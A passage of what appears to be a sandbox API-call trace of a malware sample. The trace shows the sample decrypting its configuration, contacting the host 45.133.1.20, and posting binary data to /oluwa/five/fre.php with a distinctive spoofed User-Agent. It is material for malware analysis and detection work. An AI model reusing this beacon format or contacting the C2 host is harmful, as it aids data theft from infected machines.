CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.955] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0237.967] GetProcessHeap () returned 0x6a0000 [0237.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0237.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.969] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0237.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.970] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.971] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.971] GetProcessHeap () returned 0x6a0000 [0237.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0237.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.973] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0237.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.974] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0237.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0237.975] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0237.976] GetProcessHeap () returned 0x6a0000 [0237.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0237.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.977] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0237.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.978] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0237.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.979] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0237.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0237.981] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0237.981] GetProcessHeap () returned 0x6a0000 [0237.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0237.981] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0237.981] GetProcessHeap () returned 0x6a0000 [0238.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0238.026] socket (af=2, type=1, protocol=6) returned 0x77c [0238.027] connect (s=0x77c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0238.053] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0238.053] GetProcessHeap () returned 0x6a0000 [0238.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0238.053] GetProcessHeap () returned 0x6a0000 [0238.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf20 [0238.054] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.055] wvsprintfA (in: param_1=0x6daf20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.055] GetProcessHeap () returned 0x6a0000 [0238.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4738 [0238.055] GetProcessHeap () returned 0x6a0000 [0238.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0238.056] GetProcessHeap () returned 0x6a0000 [0238.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0238.056] GetProcessHeap () returned 0x6a0000 [0238.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf20 [0238.057] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.057] wvsprintfA (in: param_1=0x6daf20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.057] GetProcessHeap () returned 0x6a0000 [0238.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0238.057] GetProcessHeap () returned 0x6a0000 [0238.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0238.058] send (s=0x77c, buf=0x6bd460*, len=242, flags=0) returned 242 [0238.059] send (s=0x77c, buf=0x6bb998*, len=159, flags=0) returned 159 [0238.059] GetProcessHeap () returned 0x6a0000 [0238.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0238.059] recv (in: s=0x77c, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0238.148] GetProcessHeap () returned 0x6a0000 [0238.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0238.149] GetProcessHeap () returned 0x6a0000 [0238.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0238.151] GetProcessHeap () returned 0x6a0000 [0238.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4738 | out: hHeap=0x6a0000) returned 1 [0238.152] GetProcessHeap () returned 0x6a0000 [0238.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0238.152] closesocket (s=0x77c) returned 0 [0238.153] GetProcessHeap () returned 0x6a0000 [0238.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0238.153] GetProcessHeap () returned 0x6a0000 [0238.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0238.153] GetProcessHeap () returned 0x6a0000 [0238.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0238.154] GetProcessHeap () returned 0x6a0000 [0238.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0238.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14b0) returned 0x77c [0238.156] Sleep (dwMilliseconds=0xea60) [0238.158] GetProcessHeap () returned 0x6a0000 [0238.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0238.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.160] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.168] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0238.178] GetProcessHeap () returned 0x6a0000 [0238.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0238.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.179] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0238.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.182] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.183] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.183] GetProcessHeap () returned 0x6a0000 [0238.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0238.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.185] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0238.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.187] CryptDestroyKey (hKey=0x6ad520) returned 1 [0238.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.188] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0238.188] GetProcessHeap () returned 0x6a0000 [0238.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0238.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.211] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.212] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.214] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.215] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.215] GetProcessHeap () returned 0x6a0000 [0238.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0238.215] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.215] GetProcessHeap () returned 0x6a0000 [0238.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0238.216] GetProcessHeap () returned 0x6a0000 [0238.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0238.218] GetProcessHeap () returned 0x6a0000 [0238.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0238.219] GetProcessHeap () returned 0x6a0000 [0238.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0238.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.221] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0238.240] GetProcessHeap () returned 0x6a0000 [0238.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0238.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.241] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0238.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.243] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.244] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.244] GetProcessHeap () returned 0x6a0000 [0238.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0238.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.246] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0238.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.247] CryptDestroyKey (hKey=0x6ad560) returned 1 [0238.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.253] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0238.253] GetProcessHeap () returned 0x6a0000 [0238.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0238.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.258] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0238.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.262] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0238.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.264] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0238.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.305] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0238.305] GetProcessHeap () returned 0x6a0000 [0238.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0238.305] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0238.305] GetProcessHeap () returned 0x6a0000 [0238.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0238.305] socket (af=2, type=1, protocol=6) returned 0x780 [0238.306] connect (s=0x780, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0238.333] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0238.333] GetProcessHeap () returned 0x6a0000 [0238.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0238.333] GetProcessHeap () returned 0x6a0000 [0238.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf20 [0238.334] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.340] wvsprintfA (in: param_1=0x6daf20, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.340] GetProcessHeap () returned 0x6a0000 [0238.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4df8 [0238.340] GetProcessHeap () returned 0x6a0000 [0238.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0238.341] GetProcessHeap () returned 0x6a0000 [0238.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0238.341] GetProcessHeap () returned 0x6a0000 [0238.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf20 [0238.342] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0238.343] wvsprintfA (in: param_1=0x6daf20, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.343] GetProcessHeap () returned 0x6a0000 [0238.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0238.343] GetProcessHeap () returned 0x6a0000 [0238.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf20 | out: hHeap=0x6a0000) returned 1 [0238.344] send (s=0x780, buf=0x6bd460*, len=242, flags=0) returned 242 [0238.344] send (s=0x780, buf=0x6bb998*, len=159, flags=0) returned 159 [0238.344] GetProcessHeap () returned 0x6a0000 [0238.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0238.344] recv (in: s=0x780, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0238.410] GetProcessHeap () returned 0x6a0000 [0238.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0238.411] GetProcessHeap () returned 0x6a0000 [0238.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0238.412] GetProcessHeap () returned 0x6a0000 [0238.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4df8 | out: hHeap=0x6a0000) returned 1 [0238.412] GetProcessHeap () returned 0x6a0000 [0238.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0238.412] closesocket (s=0x780) returned 0 [0238.413] GetProcessHeap () returned 0x6a0000 [0238.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0238.413] GetProcessHeap () returned 0x6a0000 [0238.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0238.414] GetProcessHeap () returned 0x6a0000 [0238.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0238.414] GetProcessHeap () returned 0x6a0000 [0238.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0238.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14b4) returned 0x780 [0238.417] Sleep (dwMilliseconds=0xea60) [0238.421] GetProcessHeap () returned 0x6a0000 [0238.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0238.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.434] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0238.447] GetProcessHeap () returned 0x6a0000 [0238.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6db1f0 [0238.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.448] CryptImportKey (in: hProv=0x6bed28, pbData=0x6db1f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0238.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.449] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.450] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.450] GetProcessHeap () returned 0x6a0000 [0238.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db1f0 | out: hHeap=0x6a0000) returned 1 [0238.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.452] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0238.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.458] CryptDestroyKey (hKey=0x6ad020) returned 1 [0238.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.459] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0238.459] GetProcessHeap () returned 0x6a0000 [0238.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0238.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.460] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.461] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.462] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0238.463] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.463] GetProcessHeap () returned 0x6a0000 [0238.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0238.463] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.466] GetProcessHeap () returned 0x6a0000 [0238.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0238.467] GetProcessHeap () returned 0x6a0000 [0238.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0238.467] GetProcessHeap () returned 0x6a0000 [0238.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0238.468] GetProcessHeap () returned 0x6a0000 [0238.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0238.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.469] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.477] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0238.484] GetProcessHeap () returned 0x6a0000 [0238.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0238.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.485] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0238.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0238.488] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, 